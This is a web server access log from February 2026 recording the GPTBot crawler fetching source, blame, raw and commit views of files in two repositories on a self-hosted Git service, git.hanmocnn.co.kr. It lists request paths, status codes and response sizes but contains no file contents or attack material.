+https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/components/Contact.tsx" +[17/Feb/2026:13:16:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/html/components/Footer.tsx" [Client 74.7.227.38] [Length 9867] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/components/Footer.tsx" +[17/Feb/2026:13:16:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.gitignore" [Client 74.7.227.38] [Length 10969] [Gzip 2.93] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1" +[17/Feb/2026:13:16:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/nginx.conf" [Client 74.7.227.38] [Length 11962] [Gzip 3.36] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1" +[17/Feb/2026:13:16:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/90c7377285c0e63de46467557a2f081b33097f03/html/components/Header.tsx" [Client 74.7.227.38] [Length 14958] [Gzip 7.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/components/Header.tsx" +[17/Feb/2026:13:16:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/90c7377285c0e63de46467557a2f081b33097f03/html/components/ChatBot.tsx" [Client 74.7.227.38] [Length 15901] [Gzip 7.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/components/ChatBot.tsx" +[17/Feb/2026:13:16:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/90c7377285c0e63de46467557a2f081b33097f03/html/components/Contact.tsx" [Client 74.7.227.38] [Length 16910] [Gzip 8.76] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/components/Contact.tsx" +[17/Feb/2026:13:16:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/90c7377285c0e63de46467557a2f081b33097f03/html/components/Footer.tsx" [Client 74.7.227.38] [Length 14294] [Gzip 7.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/components/Footer.tsx" +[17/Feb/2026:13:16:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/find/commit/b288a964d15beae093be1af2456d67149d3aafa1" [Client 74.7.227.38] [Length 7494] [Gzip 2.66] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1" +[17/Feb/2026:13:16:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/html/components/ChatBot.tsx" [Client 74.7.227.38] [Length 4368] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/components/ChatBot.tsx" +[17/Feb/2026:13:16:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/html/components/Footer.tsx" [Client 74.7.227.38] [Length 3846] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/components/Footer.tsx" +[17/Feb/2026:13:16:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/90c7377285c0e63de46467557a2f081b33097f03/html/components/About.tsx" [Client 74.7.227.38] [Length 13780] [Gzip 5.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/components/About.tsx" +[17/Feb/2026:13:16:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/html/components/Contact.tsx" [Client 74.7.227.38] [Length 6703] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/components/Contact.tsx" +[17/Feb/2026:13:16:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/b288a964d15beae093be1af2456d67149d3aafa1/.gitignore" [Client 74.7.227.38] [Length 9983] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.gitignore" +[17/Feb/2026:13:16:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/b288a964d15beae093be1af2456d67149d3aafa1/nginx.conf" [Client 74.7.227.38] [Length 11849] [Gzip 4.43] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/nginx.conf" +[17/Feb/2026:13:16:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/b288a964d15beae093be1af2456d67149d3aafa1/.gitignore" [Client 74.7.227.38] [Length 28] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.gitignore" +[17/Feb/2026:13:16:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/b288a964d15beae093be1af2456d67149d3aafa1/nginx.conf" [Client 74.7.227.38] [Length 796] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/nginx.conf" +[17/Feb/2026:13:16:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/html/components/Header.tsx" [Client 74.7.227.38] [Length 3639] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/components/Header.tsx" +[17/Feb/2026:13:16:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/html/components/About.tsx" [Client 74.7.227.38] [Length 2920] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/components/About.tsx" +[17/Feb/2026:13:16:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod04_pywin32.pyc" [Client 74.7.227.38] [Length 9981] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod04_pywin32.pyc" +[17/Feb/2026:13:16:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2" [Client 74.7.227.38] [Length 10592] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/assets" +[17/Feb/2026:13:16:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/find/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6" [Client 74.7.227.38] [Length 7498] [Gzip 2.67] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6" +[17/Feb/2026:13:16:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/components/Services.tsx" [Client 74.7.227.38] [Length 14653] [Gzip 4.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/components" +[17/Feb/2026:13:16:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/63aec54418d3c1735d68bf046c7a9e78a247798d?files=nginx.conf" [Client 74.7.227.38] [Length 18907] [Gzip 3.69] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/nginx.conf" +[17/Feb/2026:13:16:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/components/Services.tsx" [Client 74.7.227.38] [Length 14620] [Gzip 4.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/components" +[17/Feb/2026:13:16:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/database.sqlite" [Client 74.7.227.38] [Length 10862] [Gzip 2.93] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data" +[17/Feb/2026:13:16:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d.patch" [Client 74.7.227.38] [Length 696] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d" +[17/Feb/2026:13:16:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d" [Client 74.7.227.38] [Length 12738] [Gzip 6.35] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d" +[17/Feb/2026:13:16:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/App.tsx" [Client 74.7.227.38] [Length 12442] [Gzip 5.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/App.tsx" +[17/Feb/2026:13:16:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/README.md" [Client 74.7.227.38] [Length 11301] [Gzip 2.92] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html" +[17/Feb/2026:13:16:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/9374d883a61b35708b6c621337a654b11bcdb426.diff" [Client 74.7.227.38] [Length 1940] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/9374d883a61b35708b6c621337a654b11bcdb426" +[17/Feb/2026:13:16:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/components/Services.tsx" [Client 74.7.227.38] [Length 14650] [Gzip 4.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/components" +[17/Feb/2026:13:16:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/components/Services.tsx" [Client 74.7.227.38] [Length 14649] [Gzip 4.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/components" +[17/Feb/2026:13:16:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/components/Services.tsx" [Client 74.7.227.38] [Length 9877] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/components/Services.tsx" +[17/Feb/2026:13:16:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/components/Services.tsx" [Client 74.7.227.38] [Length 14562] [Gzip 6.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/components/Services.tsx" +[17/Feb/2026:13:16:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/components/Services.tsx" [Client 74.7.227.38] [Length 9846] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/components/Services.tsx" +[17/Feb/2026:13:16:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/components/Services.tsx" [Client 74.7.227.38] [Length 14530] [Gzip 6.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/components/Services.tsx" +[17/Feb/2026:13:16:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/database.sqlite" [Client 74.7.227.38] [Length 81792] [Gzip 50.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/database.sqlite" +[17/Feb/2026:13:16:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/database.sqlite" [Client 74.7.227.38] [Length 159744] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/database.sqlite" +[17/Feb/2026:13:16:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/components/Services.tsx" [Client 74.7.227.38] [Length 3708] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/components/Services.tsx" +[17/Feb/2026:13:16:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/README.md" [Client 74.7.227.38] [Length 9858] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/README.md" +[17/Feb/2026:13:16:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/README.md" [Client 74.7.227.38] [Length 10947] [Gzip 3.92] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/README.md" +[17/Feb/2026:13:16:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/components/Services.tsx" [Client 74.7.227.38] [Length 9876] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/components/Services.tsx" +[17/Feb/2026:13:16:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/components/Services.tsx" [Client 74.7.227.38] [Length 9875] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/components/Services.tsx" +[17/Feb/2026:13:16:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/components/Services.tsx" [Client 74.7.227.38] [Length 14559] [Gzip 6.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/components/Services.tsx" +[17/Feb/2026:13:16:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/components/Services.tsx" [Client 74.7.227.38] [Length 14559] [Gzip 6.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/components/Services.tsx" +[17/Feb/2026:13:16:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/components/Services.tsx" [Client 74.7.227.38] [Length 3708] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/components/Services.tsx" +[17/Feb/2026:13:16:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/README.md" [Client 74.7.227.38] [Length 553] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/README.md" +[17/Feb/2026:13:16:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/components/Services.tsx" [Client 74.7.227.38] [Length 3708] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/components/Services.tsx" +[17/Feb/2026:13:16:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/components/Services.tsx" [Client 74.7.227.38] [Length 14650] [Gzip 4.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/components" +[17/Feb/2026:13:16:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/components/Services.tsx" [Client 74.7.227.38] [Length 3708] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/components/Services.tsx" +[17/Feb/2026:13:16:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/.gitignore" [Client 74.7.227.38] [Length 12026] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e" +[17/Feb/2026:13:16:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/.gitignore" [Client 74.7.227.38] [Length 10950] [Gzip 2.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/3e4db647c22a7292965a613e62ce815b9da823a8/.gitignore" +[17/Feb/2026:13:16:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/.gitignore" [Client 74.7.227.38] [Length 12026] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d" +[17/Feb/2026:13:16:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/database.sqlite" [Client 74.7.227.38] [Length 131072] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/database.sqlite" +[17/Feb/2026:13:16:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/database.sqlite" [Client 74.7.227.38] [Length 10863] [Gzip 2.93] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data" +[17/Feb/2026:13:17:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/services" [Client 74.7.227.38] [Length 9925] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/services" 